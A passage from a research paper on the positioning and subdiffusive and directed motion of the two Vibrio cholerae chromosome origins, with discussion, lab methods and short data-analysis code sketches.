segregated, origins are indicated by filled circles.
To confirm that this result was a general property of the population rather than that of the relatively small number of cells followed by videomicroscopy (n oriCI = 13, n oriCII = 16), regression analysis was repeated with spot positions from static images of ∼500 cells for each chromosome (Fig. 4D). In static images it is impossible to determine if the origins are at home or segregating. Therefore, all oriC I positions were compared with the nearest pole, and oriC II positions were parsed by the number of spots in the cell. Single oriC II foci were measured from an arbitrary pole while segregated oriC II foci were compared with the nearest pole. Regression analysis with population data further supports the model that oriC I is positioned at a constant actual distance from the pole while oriC II is positioned at a constant relative distance from the pole (Fig. 4D).
Origin motion is not equal along the two axes of the cell
To characterize the dynamic motion of origins throughout the cell cycle, we first analysed the changes in origin position in single 20 s or 5 min time-lapse intervals. In sequences of 20 s intervals, no initial segregation events were observed, making it impossible to distinguish home and segregating phases. Therefore, all time intervals were considered together. The 5 min intervals were separated by phase.
For both origins, the motion was random in 20 s intervals and 5 min home phase intervals. The distributions of positional change fit Gaussian functions centred on zero (Fig. 5A-C, Table 2), demonstrating that steps are equally likely in either direction.
In addition, steps are larger in the length axis than in the width axis. For both chromosomes, the standard deviation of the step distribution is greater in the length axis than in the width axis (Fig. 5, Table 2), indicating that origins are more likely to move farther in the length axis than in the width axis in a given interval. For steps in 20 s intervals, the differences in standard deviation are small but statistically significant (F-test P = 0.003 and P << 0.0001 for oriC I and oriC II respectively). Bias towards larger steps in the long axis of the cell is more apparent at 5 min intervals, indicating a continuous effect. Again, the standard deviation is greater in the length axis for both origins (F-test P << 0.0001 for both origins). Thus motion in 20 s intervals and in 5 min home phase intervals is random in direction, but biased in magnitude with longer steps in the length axis. This bias in movement indicates that motion is differentially confined in the two axes of the cell. Furthermore, oriC I and oriC II behaved similarly between 20 s and 5 min intervals in both the length and width axes (Fig. 5), demonstrating that both origins experience similar constraints.

[Fig. 5 caption] A. The distributions of 20 s steps in the length (black squares) and width (red circles) axes fit Gaussian functions (black and red lines) centred around zero, as expected for random motion. The graphs represent 222 and 526 steps for oriC I and oriC II respectively. B and C. The steps over 5 min intervals were analysed separately for the two different phases of motion and the two axes of the cell. In the home phase, steps fit Gaussian distributions centred around zero (black and red indicate length and width axes respectively). In the segregating phase (green), the centre of the step size distribution is shifted from zero in the length (B), but not width (C), axis, indicating directional bias in the length axis. oriC I distributions represent 284 and 88 steps in the home and segregating phases respectively. oriC II distributions represent 369 and 59 steps in the home and segregating phases respectively. In both (A) and (B and C) the standard deviation is greater in the length axis than in the width axis, indicating larger steps in the long axis of the cell (see text).
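A hedged sketch of this kind of step-distribution analysis (Python/SciPy; the step data are simulated, since only summary statistics are reported in the text): it fits a zero-centred Gaussian to the steps and compares the variances of the two axes with a two-sided variance-ratio F-test.

```python
import numpy as np
from scipy import stats

rng = np.random.default_rng(1)

# Simulated home-phase 5 min steps (um): zero-centred, wider along the
# length axis than along the width axis (values chosen for illustration).
steps_len = rng.normal(0.0, 0.20, 300)
steps_wid = rng.normal(0.0, 0.12, 300)

# Gaussian fit: for random motion the fitted mean should be near zero.
mu, sigma = stats.norm.fit(steps_len)
print(f"length axis: mu = {mu:.3f} um, sigma = {sigma:.3f} um")

# Two-sided variance-ratio F-test between the two axes.
f = np.var(steps_len, ddof=1) / np.var(steps_wid, ddof=1)
dfn, dfd = steps_len.size - 1, steps_wid.size - 1
p = 2 * min(stats.f.sf(f, dfn, dfd), stats.f.cdf(f, dfn, dfd))
print(f"F = {f:.2f}, two-sided P = {p:.2g}")
```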
Motion in the segregating phase is directed
While motion in the home phase is random, motion in the segregating phase is directionally biased along the long axis. As noted above, steps are centred about zero in the home phase; that is, they are equally likely to occur towards or away from the nearest pole. In the segregating phase, steps in the length axis are not centred about zero, but rather have average values of 0.25 ± 0.29 and 0.29 ± 0.28 µm for oriC I and oriC II respectively (Fig. 5B, Table 2). Thus these steps are both longer and directionally biased. This means that in the segregating phase, oriC I is more likely to move towards the new pole than the old pole, and oriC II is more likely to move away from the mid-cell. In the width axis, differences in step sizes between the movement phases are not statistically significant (Fig. 5C), indicating that motion perpendicular to the long axis of the cell is not affected by the directional segregation of the origins. This directional bias in motion during segregation indicates that segregation of V. cholerae chromosome origins does not occur by random motion, but rather through a directed process operating strictly along the long axis of the cell. Interestingly, the mobility of the origins is clearly not more constrained during segregation than it is during the phases of the cell cycle between segregation events. Thus, the directed process driving segregation must operate while superimposed on the fairly rapid, random motions that the origins undergo while confined in the home positions, without measurably suppressing these random motions, and without apparently altering the local constraints experienced by the chromosomal segments.
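The directional bias can be tested directly: a sketch (Python/SciPy; steps simulated from the reported oriC I mean ± SD, since raw steps are not listed) asking whether segregating-phase length-axis steps are centred away from zero.

```python
import numpy as np
from scipy import stats

rng = np.random.default_rng(2)

# Simulated segregating-phase length-axis steps (um), drawn from the
# reported oriCI summary statistics (0.25 +/- 0.29 um, n = 88).
seg_steps = rng.normal(0.25, 0.29, 88)

# One-sample t-test: a mean significantly different from zero indicates
# directionally biased (not purely random) motion.
t, p = stats.ttest_1samp(seg_steps, 0.0)
print(f"mean step = {seg_steps.mean():.2f} um, t = {t:.2f}, P = {p:.2g}")
```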
Cell growth contributes to the motion of segregating origins
As discussed above, the home position of oriC I is not influenced by cell length. Conversely, the home position of oriC II moves away from the pole at about half the rate of cell growth, consistent with this origin maintaining a position near the mid-cell (Table 1). However, during segregation, oriC I moves about two times faster than cell growth (0.04 ± 0.01 versus 0.02 ± 0.01 µm min−1), and oriC II moves about three times faster than the rate of cell growth (0.06 ± 0.03 versus 0.02 ± 0.02 µm min−1) (Table 1). In addition to the directional bias in motion described above, this difference in average rates between origin movement and cell growth indicates a non-diffusive, directed segregation mechanism. Nevertheless, we found that cell growth does contribute to the segregation of the origins. We asked how much of the motion could be accounted for by cell growth alone. While cell wall synthesis is a prominent feature of cell growth, inhibition of cell wall synthesis at the septum in E. coli or along the body of the cell in B. subtilis (Webb et al., 1998) does not affect chromosome segregation. Membrane growth and increases in bulk cytosol are also important features of cell growth. The dynamics of membrane and cytoplasm growth are not well understood. Assuming that incorporation of new material into the cell is evenly distributed along the body of the cell, we calculated the expected change in position if cell growth was the only factor influencing origin movement. The ratio of the expected difference in position from cell growth to the total difference in position indicates the percentage of motion that can be accounted for by cell growth. We found that during segregation, the median contribution of cell growth to origin movement was 19% [with an interquartile (25-75 percentile) range of 2.4-44%] for oriC I and 16% (with an interquartile range of 2.8-32%) for oriC II . Thus cell growth can account for a substantial portion of the movement of the origins, but cannot account for all of the motion observed.
Origins in the home phase move subdiffusively in similarly sized caged domains
To quantitatively characterize how the origin position evolves through time, and to distinguish between diffusive, subdiffusive (caged) and superdiffusive (directed) motion, we extended our analysis to look at the change in position between intervals greater than one frame in sequences collected at 1 or 2 s, 20 s and 5 min intervals. The mean squared displacement (MSD) of origin position is plotted against the time interval (τ) (Figs 6A and B). In the home position, MSD in both axes approaches a horizontal asymptote, indicating that movement is restricted to a caged domain (Fig. 6A). However, in the segregating phase, neither origin appears caged (Fig. 6A). While the diameter of the caged domain (two times the square root of the horizontal asymptote) is different in the length and width axes, the origins of both chromosomes have comparable domains of movement. For both origins, the caging diameter in the width axis is similar (∼0.4 µm) and smaller than the width of the cell (∼0.75 µm). Likewise, the caging diameter in the length axis (∼0.6 µm) is only a fraction of the cell length (2.0-5.5 µm). Notably, the diameter of the caged domain in the length axis (∼0.6 µm) approaches the width of the cell (∼0.75 µm). Thus, because of the physical restrictions of the cell, the range of motion is more confined in the width axis and this is reflected in the smaller caging radius in this axis. The similarities in cage dimensions for both origins imply that both experience similar microenvironments, though at different locations in the cell. The slope of MSD versus time plotted on a log scale indicates whether random diffusion is governing the movement of the particle (slope = 1), whether the movement is less than that expected by diffusion and thus is constrained (slope < 1), or whether the motion is directionally biased or otherwise superdiffusive (slope > 1). In the home position, both origins behave subdiffusively on all time scales observed (Fig. 6B). This is likely a consequence of the fact that we are observing the motion of one position in a long polymeric chain. The connection to the rest of the chromosome will limit the range of movement for any particular locus. In the segregating phase, directed motion (evidenced by the bias in step direction) is superimposed on the subdiffusive behaviour of the origins, making the slope of MSD versus time difficult to interpret. Indeed, the MSD analysis reveals that origin behaviour is clearly different in the two phases (Fig. 6A and B), indicating that different kinds of forces govern origin mobility in the home and segregating phases. Together the MSD analyses and the bias in step direction suggest that motion during segregation is not superdiffusive but rather a biased random walk.
When a particle is behaving diffusively, the diffusion coefficient (D) can be derived from the slope of MSD versus time plotted on a linear scale. In our case, however, the origins are behaving subdiffusively so D represents an apparent diffusion coefficient, which is dependent on the time interval of measurement. When displacement is measured in a single dimension, D = MSD/2τ where τ is the time interval between measurements (Berg, 1993). The apparent diffusion coefficient for both origins in both cell axes was generated for each time interval and plotted versus the time interval (Fig. 6C). The apparent diffusion coefficient is comparable for the two origins, and at intervals greater than 10 s it is greater in the length axis than in the width axis. This analysis further supports the idea that motion of origins is differentially constrained in the length and width axes of the cell, but the fine-scale motions of the two chromosomal origins are similar to each other.
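A minimal MSD sketch under these definitions (Python/NumPy; the toy track and frame interval are illustrative, not the measured data): MSD is computed over overlapping windows of 1-6 frames as described in the Experimental procedures, the caging diameter is read off the plateau, and D(τ) = MSD(τ)/2τ for one-dimensional displacements.

```python
import numpy as np

def msd(positions, max_lag=6):
    """Mean squared displacement over overlapping windows of 1..max_lag
    frames for a 1-D coordinate series (e.g. length-axis position, um)."""
    positions = np.asarray(positions, dtype=float)
    return np.array([np.mean((positions[lag:] - positions[:-lag]) ** 2)
                     for lag in range(1, max_lag + 1)])

# Toy 20 s interval track (a random walk, for illustration only).
rng = np.random.default_rng(3)
track = np.cumsum(rng.normal(0.0, 0.05, 100))

dt = 20.0                                  # frame interval, seconds
m = msd(track)
taus = dt * np.arange(1, m.size + 1)

# Caged motion: MSD(tau) plateaus; caging diameter = 2 * sqrt(plateau),
# and the expected population SD is caging radius / sqrt(2).
# Apparent 1-D diffusion coefficient at each lag: D(tau) = MSD(tau)/(2 tau).
D_app = m / (2.0 * taus)
print(np.round(D_app, 5))
```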
Origin motion within individuals partially accounts for the variability in origin position observed in static populations
To assess if motion observed at the home position in these individual cells reflects the range of positions observed in still images for larger populations of cells, we compared the calculated caging radii for individuals observed by time-lapse to the range of origin positions in a large number of static images (Fig. 7). Actual distances between origins and the nearest pole or the mid-cell were measured for a population of 496 cells for oriC I and 523 cells for oriC II . The distributions of origin positions measured along the length axis among the population in these static images of cells are represented by standard deviations of 0.3 µm for all oriC I foci measured from their closest pole and 0.3 µm for oriC II foci measured from the midcell. If each position in the 5 min time-lapse datasets is taken as an independent measurement, the standard deviation for both origins is also 0.3 µm indicating that the time-lapse dataset adequately represents the larger population. However, assuming no variation in the position of the cage among individuals, the expected standard deviation for caged objects is equal to the caging radius/√2. As the caging radius we observe in the length axis by analysing the plots of MSD versus τ is 0.3 µm, the expected deviation for positions in the length axis would be 0.21 µm if the variation in the population were due to motion alone. Thus, the variation in the population reflects primarily the intrinsic origin mobility, but there is also some contribution from cell-to-cell variation.
Discussion
Here we report detailed time-lapse analysis of the gross and fine-scale dynamics of V. cholerae chromosome origins throughout the cell cycle, both of which are summarized in Fig. 8. Our analysis of fine-scale origin movements revealed (i) between segregation events, origins are not fixed in place but rather move subdiffusively within caged domains (ovals in Fig. 8) and (ii) during segregation, both origins move at comparable rates with directed motion superimposed on the rapid random subdiffusive motion characteristic of origin behaviour during maintenance at the home position. Several features of the caged domains are unexpected. First, the domains of each origin are of similar dimensions suggesting that the constraints and microenvironment experienced by each are similar, despite the dramatic differences in size, location and gross-scale behaviour of the two chromosomes. Second, motion is unequal in the two axes of the cell. It is not clear what leads to this phenomenon, but caging effects of the cell edges likely limit motion in the width axis of the cell. The gross origin behaviours we observed support those described by Fogel and Waldor (2005). Specifically, oriC I is found near, but not at, the old pole (Fig. 8, blue ovals) and segregates asymmetrically from that pole early in the cell cycle (Fig. 8B, green arrow). oriC II is found near the mid-cell before segregation (Fig. 8, red ovals) and segregates symmetrically to the quarter positions later in the cell cycle (Fig. 8B, double headed green arrow).
How are chromosome origins positioned in the V. cholerae cell?
In bacteria, the poles are physically distinct from the rest of the cell, providing a framework that enables the accumulation or exclusion of particles at or away from the pole (reviewed by Shapiro et al., 2002). In addition, in some rod-shaped bacteria, the MinCDE system facilitates the identification of the mid-cell (reviewed by Margolin, 2001). But how are components targeted to and maintained at positions that are neither the pole nor the mid-cell? What is the mechanism for measuring and enforcing the position of non-randomly distributed particles? At least two frames of measurement are theoretically possible; particles could be targeted to positions that are fixed actual distances from distinct cell features, or alternatively they could be targeted to positions at fractional distances from a cell feature. Evidence presented here indicates that in V. cholerae, both frames of measurement are used to position the origins of the two chromosomes.
In V. cholerae, oriC I is localized neither to a pole nor to the mid-cell, but rather is found in a defined domain near the pole (Fig. 8). The position of the domain is insensitive to the length of the cell, indicating that the ruler which positions oriC I measures actual (as opposed to fractional) distances. How actual distances are measured in the cell, however, is not clear. Because the oriC I domain is a constant distance from the pole, it seems likely that the pole is somehow involved in positioning this origin. One possibility is that the chromosome is excluded from the pole in a manner independent of cell cycle and that oriC I , the most distal portion of the nucleoid mass (Fogel and Waldor, 2005), is segregated to the most polar portion of the cell before it is physically excluded. It is not clear what would prevent the chromosome from occupying the polar cap region. Accumulation of ribosomes (Lewis et al., 2000; Mascarenhas et al., 2001) or other proteins at the poles could exclude oriC I from the most polar regions of the cell, although it seems surprising that the amount of these components should not increase as the cell grows. Another possibility is that a measuring protein of a specific length indicates the position of the oriC I domain from the pole. Such a protein anchored at the pole could enable the cell to physically measure the position of oriC I . Similar distance-measuring proteins are used by bacteriophages to determine tail length (Abuladze et al., 1994; Vianelli et al., 2000) and by skeletal muscle cells to measure precise lengths in the sarcomere (Wang, 1996). However, because the distance between oriC I and the pole is not precise and varies through time, we favour the hypothesis that this origin is simply excluded from the most distal region of the cell. Simultaneously, oriC II is positioned in the vicinity of the mid-cell regardless of the length of the cell (Fig. 8). In E. coli and B. subtilis, the FtsZ ring is positioned at the mid-cell by the MinCDE system, and a host of other proteins then form a complex upon the FtsZ ring to prepare the cell for division (reviewed by Margolin, 2001; Errington et al., 2003). Both FtsZ and MinCDE are found in the V. cholerae genome (Heidelberg et al., 2000); thus one possibility is that the cell directly or indirectly positions oriC II using components of either the FtsZ ring or of the Min system. In E. coli, the positioning of FtsZ to the mid-cell is strikingly accurate. While, to our knowledge, FtsZ has not been localized in V. cholerae, it should be noted that oriC II is not always positioned at precisely the mid-cell. In some cells it tracks the mid-cell closely, but in others it tracks a position slightly closer to the pole (around 40 or 60% of the cell length), and in still others oriC II moves between positions at 40-50% of the cell length. The lack of precision may reflect an imprecise readout of the Min system. Alternatively, it could indicate that the positioning mechanism is independent of the Min-established mid-cell complexes. In addition, the variation in position may reflect that the anchoring point of chromosome II is not the origin.
Alternatively, the parA and parB partitioning genes on chromosome II could act to position oriC II at the mid-cell. Interestingly, both V. cholerae chromosomes encode independent partitioning loci proximal to each origin of replication (Heidelberg et al., 2000). While the par genes encoded by chromosome I are more similar to other chromosomally encoded par genes, those from chromosome II are more similar to plasmid-encoded par genes (Gerdes et al., 2000;Heidelberg et al., 2000;Yamaichi and Niki, 2000). ParA from the E. coli plasmid pB171 oscillates from pole to pole independent of minCDE (Ebersbach and Gerdes, 2001). Moreover, this ParA positions pB171 at the mid-cell and plays a role in plasmid segregation (Ebersbach and Gerdes, 2004). Thus it is possible that the par loci on chromosome II position oriC II at the mid-cell independent of the division plane machinery.
What is the contribution of cell growth to origin segregation?
The classic hypothesis that cell wall growth provides the force to segregate chromosomes (Jacob et al., 1963) has been re-evaluated with the development of techniques for visualizing chromosome behaviour in live cells. Origin segregation in several species has been observed to be faster than cell growth (Glaser et al., 1997; Webb et al., 1998; Gordon et al., 2004; Viollier et al., 2004), indicating that bacteria must employ an active mechanism for chromosome segregation. In these studies, growth conditions were such that each cell contained one to two copies of its chromosome. While in these cases an active segregation mechanism is hard to dispute, the quantitative contribution of cell growth (i.e. incorporation of new material throughout the cell) to origin segregation has largely been ignored. Recently, Elmore et al. (2005) tracked E. coli origins in fast-growing cells where two to four origin foci are present in each cell. These researchers did not observe a period of rapid and directed movement and determined that cell growth alone could account for the segregation of origin foci under these conditions. Several differences could account for the discrepancies between experimental systems. In fast-growth conditions, when more origin copies are present, each would have a shorter distance to travel before establishing a new home. It is possible that in these conditions, the period of active movement is short enough that it is masked when looking for consecutive intervals of directed movement. Similarly, if the caged regions of the segregated origins overlap with the caged region of the parental origin focus, directed movement between parental and progeny domains may not be detectable. Alternatively, the cell may use different mechanisms to segregate chromosomes under different growth conditions. Cells may only need to rely on a directed mechanism under slower growth conditions. Under our experimental conditions, V. cholerae origin segregation is only two to three times faster than cell growth and is slower (0.04 and 0.06 µm min−1 for oriC I and oriC II respectively) than the segregation observed in other species (0.1-0.3 µm min−1; Webb et al., 1998; Gordon et al., 2004; Viollier et al., 2004). We calculated that cell growth could account for nearly 20% of the motion observed during segregation of V. cholerae origins. Because origin segregation is more rapid in other species, cell growth likely makes a smaller contribution. While cell growth contributes substantially to origin segregation, it alone cannot account for all of the motion observed.
How is the motion of DNA segments restricted within the cell?
By tracking the position of both origins through time, we observe that while each origin occupies a unique region of the cell, the position of neither origin is fixed. Motion in both axes is random in direction and both origins exhibit subdiffusive behaviour, indicating that the motion of these loci is confined. The subdiffusive behaviour may reflect the concentrated nature of the DNA in the cell and the constraints of packing a polymer that is three orders of magnitude longer than the length of the cell into the volume of the cell. If the diffusion coefficient, D, reflected free diffusion, it would correlate to the size of the molecule. In this case, the chromosomes differ in length by a factor of ∼3, yet the apparent diffusion coefficients are similar for both origins (Fig. 6C). However, if DNA is tethered at multiple discrete sites, then D is not dependent on the size of the whole polymer, but rather the length between tethering points (Marshall et al., 1997). The similar diffusion coefficients for both origins suggest that the density of connections between DNA and other parts of the cell (either directly to membranes or to transcription/translation complexes) is comparable for the two origin regions. Moreover, the apparent diffusion coefficients we observed in the long axis of the cell for V. cholerae origins between 20 and 100 s (1-4 × 10 −4 µm 2 s −1 ) are comparable to those observed for loci in yeast chromosomes and for a yeast cen plasmid calculated from similar time scales (5 × 10 −4 and 3 × 10 −4 µm 2 s −1 respectively; Marshall et al., 1997). At longer time intervals (∼1-9 min), the apparent diffusion coefficient for the origin region of fast-growing E. coli chromosomes is 3-4 × 10 −5 µm 2 s −1 (Elmore et al., 2005), similar to the apparent diffusion coefficients we observed for V. cholerae on this time scale. Overall, these data indicate that prokaryotic and eukaryotic DNA experience similar constraints within the cell.
How does movement of the origins reflect the domain structure of the Vibrio chromosomes?
Previous experiments using multiple different techniques suggest that there is large-scale domain organization in bacterial chromosomes. The organization of the domain surrounding the terminus of the chromosome is important for progression through the cell cycle (Lesterlin et al., 2005). The data presented here indicate that the origin regions of both V. cholerae chromosomes each occupy a physical domain that encompasses about 0.6 µm, or 1/3 of the length of a newly divided cell (Fig. 8), and that the origin moves randomly within this domain. Analysis of chromosomal positions in fixed cells of other bacterial species also supports a large-scale domain for each locus that occupies roughly 1/3 of the cell (Viollier et al., 2004). Complementary to these positional observations, analysis of recombination frequencies between distant chromosomal positions indicates that the bacterial chromosome is organized into a small number of macro-domains between which recombination is limited (Valens et al., 2004). The size of the macro-domains predicted by recombination frequencies (∼1/4-1/6 of the chromosome) is on the same order as the range of movement observed during chromosome localization (∼1/3 of the length axis in small cells and 1/6 of the length in longer cells). Curiously, domains on opposite sides of the chromosome, which due to the circular nature of the chromosome presumably occupy similar regions along the length axis of the cell, do not recombine with each other (Valens et al., 2004). In the absence of a mechanism to distinguish opposite halves of the chromosome, this result implies spatial restriction in the width axis. The caging radii we observe in the width axis predict domains that occupy about half of the cell width. This observation further supports the model that spatial restriction of the chromosome limits recombination between opposite halves of the chromosome. Together these results indicate large-scale organization of domains in bacterial chromosomes, though the functional consequences of these domains are not yet clear. Lastly, it is notable that the sizes of eukaryotic chromosome territories are 0.4-0.8 µm (Zink et al., 1998), which is very comparable to the domain dimensions reported here (0.4 µm by 0.6 µm). This again indicates that prokaryotic and eukaryotic chromosomes experience similar constraints.
Strain construction
Arrays of tandem copies of lacO or tetO sequences were integrated into the sequenced strain of V. cholerae, N16961 (provided by G. Schoolnik) (Heidelberg et al., 2000). For integration into V. cholerae, several modifications were made to the pLau43 and pLau44 vectors carrying the lacO and tetO arrays (Lau et al., 2003). First, to generate vectors that could not autonomously replicate in V. cholerae, the pUC18 origins were replaced with the R6K origin, which requires the pir gene product for replication. The XhoI/BamHI fragment from pR6K (Epicentre, Madison, WI) was cloned into the large SalI/BamHI fragment from pLau43 and the XhoI/SalI fragment from pR6K was cloned into the large SalI/XhoI fragment from pLau44 to generate pAF104 and pAF105 respectively. These and subsequent vectors were propagated in EC100D pir+ (Epicentre, Madison, WI) or Pir2 (Invitrogen, Carlsbad, CA), two strains of E. coli which support R6K origins of replication. Second, the kanamycin-resistance gene in the lacO array was replaced with the chloramphenicol-resistance gene, cat. cat from pACYC184 (New England Biolabs, Beverly, MA) was PCR amplified and subcloned into pCR-Blunt II-TOPO (Invitrogen, Carlsbad, CA), excised with NsiI, and ligated into the NsiI sites in the KmR gene in pAF104 to generate pAF106. Third, an oriT was added to allow the array-bearing vectors to be transferred to V. cholerae by conjugation. A SpeI fragment containing oriT from pHPV412 (provided by Patrick Viollier) was cloned into the SpeI site of pAF106 and pAF105, generating pAF119 and pAF118 respectively. Last, ∼1000 bp regions of genomic sequence from V. cholerae were added to these vectors to target integration to a specific locus. Chromosomal sequences were PCR amplified, subcloned into pCR-Blunt II-TOPO, removed with XbaI and SpeI, and ligated into the NheI site in either pAF119 or pAF118. Integration was targeted to regions between genes on opposite strands such that the arrays were integrated into overlapping terminator regions as opposed to promoter regions. Because these intergenic regions are small (usually < 50 bp), portions of the flanking genes were amplified together with the intergenic region to enlarge the homologous region and thereby increase integration efficiency. This strategy minimizes the chances of disrupting function or regulation of the genes near the integration site.
These constructs were then transferred by conjugation from the Pir2 E. coli strain into V. cholerae N16961 using the helper strains LS256 or LS980 (provided by Lucy Shapiro). Integrants were selected with 2 µg ml−1 chloramphenicol and/or 20 µg ml−1 gentamycin as appropriate. E. coli was counterselected with 100 µg ml−1 streptomycin. The tetO array was integrated between VCA1103 and VCA1104 (∼12 kb from oriC II ) in AVC89 and between VC2761 and VC2762 (∼13 kb from oriC I ) in AVC93. The lacO array was inserted between VC2761 and VC2762 (∼13 kb from oriC I ) in AVC89 and between VCA0010 and VCA0011 (∼9 kb from oriC II ) in AVC93. pLAU53 (Lau et al., 2003), which carries TetR-YFP and LacI-CFP under the control of the pBAD promoter, was electroporated into strains containing the arrays and selected with 100 µg ml−1 carbenicillin. AVC93 was used for time-lapse analysis of oriC I and AVC89 was used for time-lapse analysis of oriC II .
Growth conditions/sample preparation
Overnight cultures were inoculated from freshly plated freezer stocks in M9 glucose minimal media (Sambrook and Russell, 2001) supplemented with an additional 0.5% glucose, 0.01% casamino acids and appropriate antibiotics, and grown on a roller at 37°C. Overnight cultures were diluted ∼1:100 in fresh media and grown to early log phase (OD600 0.2-0.3). A small aliquot (1-1.5 ml) was gently pelleted for 1 min at 3500 g. Cells were resuspended in fresh media without antibiotics. Arabinose was added to a final concentration of 0.2% to induce expression of TetR-YFP and LacI-CFP. Expression of the fluorescent proteins was induced for 30-45 min at room temperature without shaking. One microlitre of cells was then placed on a 1-2% agarose pad made with the same media for observation. The doubling time for cells on the microscope was 80-100 min. Expression of the fluorescent proteins from the pBAD promoter was leaky in these strains and fluorescent foci were frequently observed in the absence of arabinose.
Microscopy
Cells were visualized on a Nikon Diaphot 300 inverted microscope at room temperature using a 60× objective. The image was further magnified by a 2× lens in front of the camera. YFP and CFP were visualized using filter set number 52017, which includes single-band exciters (Chroma, Rockingham, VT). Metamorph version 6.1 (Molecular Devices, Sunnyvale, CA) was used to drive the filter wheels and shutters. Images were collected on a cooled CCD camera (Princeton Instruments, Princeton, NJ). To determine the general localization patterns of each origin, still images of large numbers of cells were acquired, visualizing both YFP and CFP sequentially using exposure times of 0.4-2 s. For time-lapse analysis, we followed the origins tagged with the tetO arrays and visualized with TetR-YFP. Origins visualized with YFP were bright and easy to detect due to negligible background in early logarithmic phase. The CFP signal, on the other hand, is dimmer and harder to detect due to the high background generated by autofluorescence of endogenous molecules in V. cholerae. Furthermore, frequent exposure to the CFP excitation light was phototoxic; in our experimental set-up, cells cease to grow with blue light exposures of 250 ms at intervals of 10 min or less. As we were interested in the dynamic behaviour on short time scales, YFP was the superior fluorescent tag. Time-lapse sequences were acquired with fluorescence exposure times of 400 ms.
Image analysis
Time-lapse studies. All image analysis was done with Matlab version 7.0 (The MathWorks, Natick, MA) using the image analysis toolbox. A Gaussian filter was applied to the raw fluorescence images and spots were detected by thresholding. Spot positions were calculated as the centroid of the thresholded region. The cell poles and centreline were determined manually for each cell in each frame of the time-lapse image sequences. The centrelines were determined with 6-10 linear segments. A line from the centroid of the fluorescent spot was drawn normal to the centreline. The distance between the spot centroid and the centreline indicated the position of the spot in the width axis. The distance between the normal line and the pole, along the centreline, indicated the position of the spot in the length axis (Fig. 2). To follow an origin through a time-lapse movie, spots were tracked by automatically associating each spot with the closest spot in the following frame in the XY plane. When spots divided, a new track was initiated and the parental spot was added to both daughter tracks.
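A rough Python/SciPy analogue of this detection-and-tracking pipeline (the original used Matlab's image analysis toolbox; the threshold heuristic and function names below are assumptions, not the authors' choices):

```python
import numpy as np
from scipy import ndimage

def detect_spots(frame, sigma=1.0, thresh=None):
    """Gaussian-filter a fluorescence frame, threshold it, and return the
    centroids of the connected bright regions (one per focus)."""
    sm = ndimage.gaussian_filter(frame.astype(float), sigma)
    if thresh is None:
        # Assumed heuristic; the original threshold choice is not stated.
        thresh = sm.mean() + 3.0 * sm.std()
    labels, n = ndimage.label(sm > thresh)
    return np.array(ndimage.center_of_mass(sm, labels, np.arange(1, n + 1)))

def link(prev_spots, next_spots):
    """Associate each spot with the closest spot in the following frame,
    as in the nearest-neighbour tracking described above."""
    return [(i, int(np.argmin(np.linalg.norm(next_spots - p, axis=1))))
            for i, p in enumerate(prev_spots)]
```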
Population studies. To identify cell bodies, phase images were thresholded. The identified regions were filtered according to size and width to eliminate touching cells. We then used an automated algorithm to identify the poles and the centrelines for each cell. First, the poles were identified as the two most distant points on the outline of the thresholded mask. Then, for each pixel along one side of the outline, the nearest pixel on the opposite side of the bacterium was identified, and the midpoint between them was calculated. The sum of the distance between the midpoints generates the length of the bacterium and the line drawn through the midpoints generates the centreline of the bacterium. Spots were identified and their positions were measured as in the time-lapse.
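The pole/centreline construction can be sketched the same way (Python; it assumes the cell outline is available as an ordered array of boundary pixel coordinates, e.g. from a contour tracer, which is an assumption about upstream processing):

```python
import numpy as np
from scipy.spatial.distance import cdist

def poles_and_centerline(outline):
    """Poles and centreline of one cell, from its ordered outline pixels
    (an (M, 2) array; assumed input, see lead-in)."""
    d = cdist(outline, outline)
    i, j = np.unravel_index(np.argmax(d), d.shape)   # two most distant points
    lo, hi = sorted((i, j))
    poles = outline[lo], outline[hi]

    # Split the closed outline into the two sides running between poles.
    side_a = outline[lo:hi + 1]
    side_b = np.vstack([outline[hi:], outline[:lo + 1]])

    # Midpoint between each side-A pixel and its nearest opposite pixel.
    nearest = side_b[np.argmin(cdist(side_a, side_b), axis=1)]
    centerline = (side_a + nearest) / 2.0

    # Cell length is the summed distance between successive midpoints.
    length = np.linalg.norm(np.diff(centerline, axis=0), axis=1).sum()
    return poles, centerline, length
```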
Motion analysis
For quantitative analysis, the segregation phase begins with initial separation (i.e. the interval during which one focus separates into two distinct foci) and ends when the chromosome reaches a new home domain.
For oriC I , length measurements in the home position were always from the closest pole and length measurements in the travelling phase were always from the old pole. Thus when segregation was observed, both spots were measured from the old pole. As soon as the segregating spot established a new home position, its distance was measured from the new pole to enable comparisons with other home phase origins. For oriC II , at the beginning of a time-lapse sequence, an arbitrary pole was chosen as the reference point. During the segregation phase, the reference point was the pole from which the origin was moving away. Thus pairs of sister origins were measured from opposite poles during segregation. This allowed comparisons of all origins during segregation. When a new home is established, the closest pole became the reference point for regression analysis. After a cell division, the new pole was used as the reference point for oriC II .
To estimate the motion attributable to cell growth, we calculated the position expected if uniform growth along the body of the cell were responsible for the change in position, using the following equation: expected distance(n+1) = [distance(n) / cell length(n)] × cell length(n+1). The ratio expected distance(n+1) / actual distance(n+1) gives the proportion of motion that can be attributed to cell growth.
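In code, the growth correction amounts to a one-line rescaling; the numbers in the example below are hypothetical, not measurements from the study.

```python
def growth_fraction(dist_n, len_n, dist_n1, len_n1):
    """Fraction of a spot's displacement explainable by uniform cell growth.

    expected(n+1) = [dist(n) / len(n)] * len(n+1); the ratio
    expected(n+1) / actual(n+1) is the growth-attributable proportion."""
    expected = (dist_n / len_n) * len_n1
    return expected / dist_n1

# e.g. a spot 1.0 um from the pole in a 3.0 um cell that grows to 3.3 um:
# expected position 1.1 um; if the spot actually moved to 2.0 um, only
# ~55% of the displacement is attributable to growth.
print(growth_fraction(1.0, 3.0, 2.0, 3.3))  # ~0.55
```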
For MSD (Qian et al., 1991; Berg, 1993), we calculated the mean squared change in origin position over overlapping sequential intervals of one to six frames from all time-lapse movies, for each frame interval (1 or 2 s, 20 s, and 5 min). For oriCI, differences in position were measured relative to the nearest/home pole. For oriCII, differences in position in the length axis were measured from mid-cell.
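A sketch of the MSD calculation over overlapping intervals, assuming a one-dimensional position trace (in µm); the lag range follows the one-to-six-frame scheme described above.

```python
import numpy as np

def msd(positions, max_lag=6):
    """Mean squared displacement of a 1-D position trace, averaged over
    all overlapping pairs of frames separated by 1..max_lag intervals."""
    x = np.asarray(positions, dtype=float)
    lags = range(1, min(max_lag, len(x) - 1) + 1)
    return {lag: np.mean((x[lag:] - x[:-lag]) ** 2) for lag in lags}
```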
